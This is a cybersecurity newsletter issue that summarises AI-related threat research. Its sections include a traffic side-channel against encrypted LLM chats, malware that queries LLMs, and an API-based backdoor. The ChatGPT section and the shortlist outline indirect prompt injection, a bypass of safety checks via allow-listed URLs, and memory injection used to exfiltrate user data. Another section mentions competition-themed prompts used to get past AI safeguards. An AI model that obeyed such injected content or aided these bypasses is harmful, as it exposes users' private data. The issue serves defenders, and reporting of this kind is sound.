PRESENTED BY
Cyber AI Chronicle
By Simon Ganiere · 9th November 2025
Welcome Back!
Even the strongest encryption isn't enough to keep AI conversations private, as Microsoft researchers have demonstrated with a new attack that can determine chat topics by analyzing network traffic patterns alone. The 'Whisper Leak' technique achieves near-perfect accuracy in classifying sensitive discussions, prompting immediate response from major AI providers.
This discovery reveals a fundamental blind spot in AI security—while we focus on protecting the content of communications, the metadata itself can betray our most private interactions. As AI becomes more integrated into sensitive workflows, how do we defend against threats that don't need to break encryption to compromise privacy?
In today's AI recap:
The Encryption Blind Spot
What you need to know: Microsoft has uncovered a new side-channel attack called 'Whisper Leak' that can determine the topic of AI chat conversations, even when the traffic is fully encrypted.
Why is it relevant?:
The attack works by analyzing the unique "fingerprints" of network traffic, specifically the packet size and timing, to classify what a user is discussing with an LLM.
The method is highly effective, as the research achieves near-perfect classification (>98% AUPRC) and can identify sensitive topics with high precision even in extremely noisy environments.
In response, major AI providers including OpenAI, Mistral, and Microsoft have already deployed mitigations, such as adding random padding to chatbot responses to obscure these traffic patterns.
Bottom line: This discovery highlights that even with strong encryption, metadata leakage from AI services is a significant privacy risk. Securing these side-channels is becoming a critical new frontier for cybersecurity professionals as AI integration deepens.
Go from AI overwhelmed to AI savvy professional
AI will eliminate 300 million jobs in the next 5 years.
Yours doesn't have to be one of them.
Here's how to future-proof your career:
Join the Superhuman AI newsletter - read by 1M+ professionals
Learn AI skills in 3 mins a day
Become the AI expert on your team
Malware Gets a Brain
What you need to know:Google's Threat Intelligence Group reports a major evolution in cyber threats, with state-sponsored actors deploying malware that uses generative AI during execution to rewrite its own code and generate commands on the fly.
Why is it relevant?:
A new experimental malware, PROMPTFLUX, uses Gemini's API to rewrite its own source code hourly, a technique designed to evade static detection by constantly changing its signature.
For the first time in live operations, Russia's APT28 has deployed malware called PROMPTSTEAL that queries an LLM to dynamically generate data-stealing commands, making attacks less predictable.
Attackers are also using social engineering prompts, like pretending to be in a cybersecurity competition, to trick AI models and bypass AI safeguards for help with system exploitation.
Bottom line: This shift from using AI for productivity to embedding it in malware's core logic presents a new challenge for traditional, signature-based security tools. Defenders must now anticipate threats that can think and adapt in real-time, accelerating the need for AI-driven detection and response capabilities.
Hiding in Plain Sight
What you need to know: Microsoft discovered a new backdoor, dubbed 'SesameOp,' that cleverly uses OpenAI's legitimate Assistants API as a covert command-and-control channel to evade detection.
Why is it relevant?:
Instead of using its own servers, the malware fetches encrypted commands and sends back stolen data through the API, making its traffic look like legitimate AI activity.
The attack chain involves a heavily obfuscated loader that deploys the backdoor using a .NET AppDomainManager injection into Microsoft Visual Studio utilities.
The attack misuses a built-in feature, not a vulnerability, of the Assistants API which OpenAI had already scheduled for deprecation in August 2026.
Bottom line: This attack highlights a growing trend of threat actors using trusted cloud services as camouflage for their malicious operations. For security teams, the challenge shifts from simply blocking bad domains to distinguishing malicious API calls from legitimate ones.
ChatGPT's Leaky Memory
What you need to know: Tenable has discovered seven critical vulnerabilities in ChatGPT that allow attackers to steal private data from user memories and chat histories. The attacks exploit the AI's web browsing and memory features through indirect prompt injections.
Why is it relevant?:
The attacks don't require tricking a user into a specific action; one zero-click vulnerability can be triggered just by asking ChatGPT a question that leads it to a malicious, indexed website.
Attackers can chain exploits, such as bypassing safety checks with allow-listed Bing URLs and using a 'Conversation Injection' technique to make ChatGPT poison its own chat context.
One of the most concerning techniques is 'memory injection,' which can permanently alter a user's ChatGPT memory to exfiltrate data across all future conversations, creating a persistent threat.
Bottom line: This research shows that as AI models gain more capabilities like web browsing and memory, their attack surface expands in unpredictable ways. Securing these external data integrations is a critical challenge for AI developers and a key risk for security teams to monitor.
AI's Malicious Code Test
What you need to know: A malicious VS Code extension with ransomware capabilities, likely generated with AI, was successfully published to Microsoft's official marketplace. The incident highlights a critical gap in the security vetting process for developer tools.
Why is it relevant?:
The extension, dubbed 'AI slop' by researchers, showed obvious signs of being AI-generated, with commented-out code and a simple structure that was functional but not refined.
It slipped through Microsoft’s review process despite a blatantly malicious description, a suspicious publisher name, and functionality that openly advertised file theft and encryption.
Upon activation, the tool would create a .ZIP archive to exfiltrate files to a command-and-control server before encrypting the local copies, testing a simple but effective extortion model.
Bottom line: This event shows how AI can lower the barrier for creating and deploying malicious code into trusted software ecosystems. It places a new urgency on platform owners to improve security checks and on developers to scrutinize their supply chains.
The Shortlist
Researchers discovered that Anthropic's Claude AI can be tricked by indirect prompt injections into exfiltrating user data and chat memories through its own Files API.
Google used its 'Big Sleep' AI agent to discover five new security vulnerabilities in Apple's Safari WebKit, which could lead to browser crashes and memory corruption.
Keras contained a data exposure vulnerability in its preprocessing layers that allowed malicious models to read arbitrary local files or conduct SSRF attacks during the deserialization process.
Zscaler acquired AI security company SPLX to integrate its AI asset discovery, red teaming, and runtime threat inspection capabilities into the Zero Trust Exchange platform.
AI Influence Level
Level 4 - Al Created, Human Basic Idea / The whole newsletter is generated via a n8n workflow based on publicly available RSS feeds. Human-in-the-loop to review the selected articles and subjects.
Reference: AI Influence Level from Daniel Miessler
Till next time!
Project Overwatch is a cutting-edge newsletter at the intersection of cybersecurity, AI, technology, and resilience, designed to navigate the complexities of our rapidly evolving digital landscape. It delivers insightful analysis and actionable intelligence, empowering you to stay ahead in a world where staying informed is not just an option, but a necessity.